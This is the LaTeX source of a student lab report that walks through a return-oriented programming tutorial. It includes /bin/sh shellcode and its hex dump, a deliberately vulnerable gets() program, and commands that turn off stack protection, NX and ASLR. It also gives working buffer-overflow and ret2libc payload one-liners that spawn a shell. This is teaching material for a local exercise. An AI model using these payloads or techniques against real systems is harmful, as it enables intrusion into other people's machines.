\documentclass{article}
\usepackage[utf8]{inputenc}
\usepackage[margin=1in]{geometry}
\usepackage{setspace,mathtools,indentfirst}
\usepackage{fancyhdr} % for header
\usepackage{listings}
\usepackage{mathtools,setspace,indentfirst,graphicx,float,url,color}
\usepackage{setspace}
\doublespacing

\lstset{%
  basicstyle=\ttfamily,
  captionpos=b,
  frame=tb,
  tabsize=2,
  showstringspaces=false,
  commentstyle=\color[RGB]{24,135,64},
  keywordstyle=\color{blue},
  stringstyle=\color{red}
}

\begin{document}

\title{Return Oriented Programming Tutorial Demo/Report}
\date{December 9, 2017}
\author{Francesca Truncale, Max Inciong, Paul Tan}
\maketitle

\newpage
\tableofcontents
\newpage

\section{Some assembly required}
This section was the most straight forward. The provided c code worked without a hitch.

\begin{lstlisting}[language=c,caption={Provided shell.c}]
int main() {
  asm("\
needle0: jmp there\n\
here:    pop %rdi\n\
         xor %rax, %rax\n\
         movb $0x3b, %al\n\
         xor %rsi, %rsi\n\
         xor %rdx, %rdx\n\
         syscall\n\
there:   call here\n\
.string \"/bin/sh\"\n\
needle1: .octa 0xdeadbeef\n\
  ");
}
\end{lstlisting}

\includegraphics{../images/shellc.PNG}

\section{The shell game}

\subsection{Obtaining the shellcode}

First, we need to extract the shellcode for our system by using our compiled shell.c

As per the tutorial, this is done by first finding out where our code starts and ends.
The command given by the tutorial is:

\texttt{
objdump -d a.out | sed -n '/needle0/,/needle1/p'
}
\texttt{sed} is a stream editor, used to filter the output from objdump. We want the values between needle0 and needle1, which contain the code we wish to inject.

Running it returns the following:

\includegraphics{../images/shellgame_objdump.png}

On this system, the code runs between \texttt{0x61b} and \texttt{0x5fe}.
As expected, this is 29 bytes, which we then round up to the nearest power of 8. (this being 32)
This is needed for later, as this will help us create a shell.

The next step is to run:
\texttt{
xxd -s0x5fe -l32 -p a.out shellcode
}
\texttt{xxd} creates a hex dump of the input.
The \texttt{}{-s} flag is used to seek, to start at that offset.
\texttt{-l} is used to specify the length of the output.

Feeding it \texttt{a.out} outputs a hexdump that applies the previous flags to \texttt{a.out}, and sends that output to \texttt{shellcode}.

By viewing this file with a text editor or the bash \texttt{cat shellcode}, we see that the shellcode is:

\texttt{
eb0e5f4831c0b03b4831f64831d20f05e8edffffff2f62696e2f736800ef
bead
}

\subsection{First Code Injection}

Stack smashing is difficult.

GCC has Stack Smashing Protection (SSP), which allows the compiler to rearrange the stack to make buffer overflows less dangerous, as well as creating stack integrity checks for runtime use.

Executable space protection (NX) prevents executing code in the stack, as it will instead cause a segmentation fault. This is the cause of the \textbf{many} failures trying to run these sections.

Address Space Layout Randomization (ASLR) randomizes the location of the stack on every run. As a result, we would be unable to place a payload in the overwritten return address.

Due to this, we disable SSP on compilation using the \texttt{-fno-stack-protector} flag on the provided victim c code, disable executable space protection with execstack using the \texttt{-s} flag, and disable ASLR when running the binary using \texttt{setarch} with the \texttt{-R} flag.

\begin{lstlisting}[language=c,caption={victim.c, with added print to get the address of the buffer}]
#include <stdio.h>
int main() {
  char name[64];
  printf("%p\n", name);  // Print address of buffer.
  puts("What's your name?");
  gets(name);
  printf("Hello, %s!\n", name);
  return 0;
}
\end{lstlisting}

\includegraphics{../images/shellgame_disableprotections.png}

Since ASLR is disabled on this run, the address of the buffer (0x7fffffffe100) will be the same on every run.

We will quickly convert this value to little endian, for usage in the attack.
This can be done with:
\texttt{a=`printf \%016x 0x7fffffffe100 | tac -rs..`
}

\subsection{Attack}

We concatenate the shellcode, 80 zeros, and our little endian address (which is stored in variable \texttt{\$a}).

The zeros fill the rest of the buffer after the shellcode, and overwrite the RBP register, as well as the return adress to point to where our shellcode is.

\includegraphics[scale=0.75]{../images/shellcode_attack.png}

\section{The Importance of Being Patched}

\subsection{Problems Begin}
This section presented the most issues.

Throughout multiple VMs, and a laptop running bare metal Debian (sid) [Linux Kernel 4.12.x], the following command does \textbf{not} do as intended.

\texttt{ps -eo cmd,esp}

This command \textit{should} display the process name and stack pointer of everything on the system, however...

\includegraphics{../images/patched_issues.png}

It clearly, does not.

As it turns out, an unpatched system is required to actually get these values to be anything but a load of 0s.

And Google said nothing about it.

A Linux distro equivalent to Ubuntu 12.01 is \textit{required}.
Luckily, Max's ran a VM of an old enough version of Linux Mint (essentially Ubuntu) to be unpatched.

\subsection{And Now, We Begin}
First we run \texttt{victim} without ASLR as in the last section.
In another terminal, we run
\texttt{
ps -o cmd,esp -C victim
}

Which only gives us the information of the specified \texttt{victim} process, thanks to the \texttt{-C} flag.

This locates the stack pointer, while victim waits for user input.
The distance from this pointer to the name buffer is 88, calculated by subtracting the value from the previous section (0x7fffffe090, due to this being from a different computer the value is different), from the value in the stack pointer.

We run the victim in a piped space, by using:
\texttt{
\$ mkfifo pip
\$ cat pip | ./victim
}

In a separate terminal, we run:
\texttt{
\$ sp=`ps --no-header -C victim -o esp`
\$ a=`printf \%016x \$((0x7fff\$sp+88)) | tac -r -s..`
\$( ( cat shellcode ; printf \%080d 0 ; echo \$a ) | xxd -r -p ;
cat ) > pip
}

\texttt{\$sp} is the stack pointer, saved to a bash variable.
\texttt{\$a} is adds the offset of the buffer in little endian.
The \texttt{cat} line executes the shell from the second terminal, which shows the results in the first.

By reactivating the executable space protection with \texttt{execstack -c victim}, the this attack does not work. There is a segmentation fault that displays instead, as the space is marked as nonexecutable.

\includegraphics[scale=0.5]{../images/patched_actual.png}

\section{Go go gadget, last-section-of-the-report}

The goal of this part of the tutorial is to bypass executable space protection.
To do this, we are to use a \"gadget", a sequence of instructions ending in RET.

First, we locate a 64-bit version of libc on, using \texttt{locate libc.so}

However, this again did not work on either of my usual Linux environments, this time due to the encrypted home directory. (Encrypted home directories seem to break locate due to a lack of visible indexing)

libc.so was instead located manually.

It's located at \texttt{/lib/x86\_64-linux-gnu/libc.so.6}

We wish to execute

\texttt{
pop \%rdi
retq
}

To do this, we can use the provided \'ugly workaround'.

\begin{lstlisting}
xxd -c1 -p /lib/x86\_64-linux-gnu/libc.so.6 | grep -n -B1 c3 |
grep 5f -m1 | awk \'{printf"\%x\n",\$1-1}'
\end{lstlisting}

The above dumps the library as one hex code per line and looks for \"c3", then within those results searches for the first match of \"5f."

This can also be accomplished using ROPgadget, which works  noticably slower for the same results, however.

\texttt{
ROPgadget --binary /lib/x86\_64-linux-gnu/libc.so.6 --only \"pop|ret\" | grep rdi
}


Both find that the value is \texttt{ifeea}.
Next we need to add libc's address to the offset from above, combine it with the address of \texttt{/bin/sh}, and the address of libc's \texttt{system()} function.

\subsection{Episode IV: A False Hope}

We run victim with ASLR disabled in one terminal first, then in a separate one we run

\begin{lstlisting}
pid=`ps -C victim -o pid --no-headers | tr -d ' '`}
\end{lstlisting}
to save victim's pid to a variable.

Then we run \texttt{grep libc /proc/\$pid/maps}, which reveals where libc is loaded into memory.

\includegraphics{../images/libc_mem.png}

This shows that libc is loaded starting at \texttt{0x7f5ff6ee8000}.
Thus, the address of the gadget is \texttt{0x7f5ff6ee8000+0x1feea}.

As used in the first section, the address of \texttt{/bin/sh} was provided by the victim code \texttt{0x7fffffffe100}.
The location of system is found with \texttt{nm -D /lib/x86\_64-linux-gnu/libc.so.6 | grep \'\\<system\\>'}
This returns \texttt{0x0000000000040d60}

Therefore, the system function should be \texttt{0x7fffffffe100 + 0x40d60}.

The final command would then be:
\begin{lstlisting}[language=bash]
(echo -n /bin/sh | xxd -p; printf %0130d 0;
printf %016x $((0x7f5ff6ee8000+0x1feea)) | tac -rs..;
printf %016x 0x7fffffffe100 | tac -rs..;
printf %016x $((0x7fffffffe100+0x40d60)) | tac -rs..) |
xxd -r -p | setarch `arch` -R ./victim
\end{lstlisting}

However, this fails.


\includegraphics{../images/libc_fail.png}

\subsection{Oh.}

At the top of the tutorial, a link leads to another tutorial.

This one reveals that we need to disable ASLR system wide using \texttt{echo 0 | sudo tee /proc/sys/kernel/randomize\_va\_space} or \texttt{setarch `arch` -R ./victim} locally, and provides a different form of the payload as well.

\begin{lstlisting}[language=bash, caption="New Payload"]

(((printf %0144d 0; printf %016x 0x7ffff7a37b1a | tac -rs..; printf %016x 0x7fffffffdc80 | tac -rs..; printf %016x 0x7ffff7a5b640 | tac -rs.. ; echo -n /bin/sh | xxd -p) | xxd -r -p) ; cat) | ./victim

\end{lstlisting}

This was adapted using the previously found values.
The main differences are the 144 zeros over 130, and an offset of 96 (64+8+24) instead of 88 due to the registers.

As tested on Paul's machine:

\includegraphics[scale=0.5]{../images/libc_end.png}


\end{document}
